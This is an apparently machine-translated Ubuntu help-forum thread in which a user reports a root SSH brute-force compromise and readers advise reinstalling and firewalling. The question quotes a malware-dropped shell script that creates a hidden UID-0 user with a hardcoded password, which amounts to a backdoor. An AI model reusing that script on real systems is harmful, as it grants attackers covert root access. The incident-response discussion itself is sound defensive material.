Як боротися зі шкідливим програмним забезпеченням на своєму ноутбуці?

12

Я впевнений, що мій ноутбук Ubuntu 13.10 заражений якимось шкідливим програмним забезпеченням.

Час від часу я знаходжу процес / lib / sshd (належить root), який працює і споживає багато процесора. Не сервер sshd працює / usr / sbin / sshd.

Бінарний файл має --wxrw-rwt дозволи, і він генерує та породжує сценарії в каталозі / lib. Нещодавній називається 13959730401387633604, і він робить наступне

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

Користувач gusr був створений зловмисним програмним забезпеченням самостійно, а потім chpasswd висить при споживанні 100% процесора.

Поки що я визначив, що користувача gusr додатково додавали до файлів у / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Схоже, зловмисне програмне забезпечення створило копії всіх цих файлів із суфіксом "-". Повний список / etc / файлів, які були модифіковані коренем, доступний тут .

Крім того, файл / etc / hosts було змінено на це .

/ Lib / sshd починається з додавання себе до кінця файлу /etc/init.d/rc.local!

Я видалив користувача, видалив файли, убив дерево оброблюваного, змінив паспорти та видалив ssh відкриті ключі.

Я усвідомлюю, що я в основному накручений, і, швидше за все, переустановлюю всю систему. Тим не менше, оскільки я входжу в декілька інших машин, було б добре хоча б спробувати його зняти, і з'ясувати, як я його отримав. Будемо вдячні за будь-які пропозиції щодо цього.

Схоже, вони потрапили 25 березня за допомогою грубої кореневої реєстрації. Я не здогадувався, що кореневий ssh ​​увімкнено за замовчуванням в Ubuntu. Я відключив це і виставив заперечення.

Логін був від 59.188.247.236, мабуть, десь у Гонконзі.

Я отримав ноутбук від EmperorLinux, і вони включили кореневий доступ. Якщо у вас є одна з таких, і ви запускаєте sshd, будьте обережні.

security  malware 
Деян Йованович
джерело
2
Вимкніть свою машину від мережі! Зараз!
Сет
2
І чому у вас ввімкнено кореневий вхід? Це те, чого не слід допускати без поважних причин.
Сет
@Seth Я не ввімкнув це, він був за замовчуванням у Ubuntu. Я так само здивований, як і ти.
Деян Йованович
1
Див. " За замовчуванням демон SSH постачається з увімкненими віддаленими кореневими входами. Зазвичай Ubuntu не дозволяє отримати прямий доступ до кореневого користувача, тому цей параметр є неважливим. Якщо ви встановили пароль для кореневого облікового запису, цей параметр може бути потенційним ризик для безпеки, і його слід відключити ".
Сет
1
Я досить впевнений, що це не так Linux/Ebury. Це щось інше і, можливо, не присвоєно ім'я. Ebury не створив би новий обліковий запис користувача, а змінив би спільну бібліотеку, яку використовує openssh, а не видаляється в новій бінарній назві sshd.
Рікінг

Відповіді:

11

По-перше, вийміть цю машину з мережі зараз!

По-друге, чому увімкнено кореневий рахунок? Ви дійсно не повинні вмикати кореневий обліковий запис, якщо у вас немає дуже вагомих причин для цього.

По-третє, так, єдиний спосіб бути впевненим у чистоті - це зробити чисту установку. Також рекомендується почати свіжий і не повертатися до резервного копіювання, оскільки ви ніколи не можете бути впевнені, коли все почалося.

Я також пропоную вам встановити брандмауер під час наступної інсталяції та відхилити всі вхідні з'єднання: 

sudo ufw default deny incoming

а потім дозвольте ssh за допомогою: 

sudo ufw allow ssh

і НЕ вмикайте кореневий рахунок! Звичайно переконайтеся , що корінь SSH Ввійти відключений.

Сет
джерело
4
Я перевірив кореневий рахунок. Я отримав ноутбук від Emperorlinux, і вони дали змогу налаштувати його. Дурний.
Деян Йованович
1
@ DejanJovanović Це жахливо!
Сет
Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.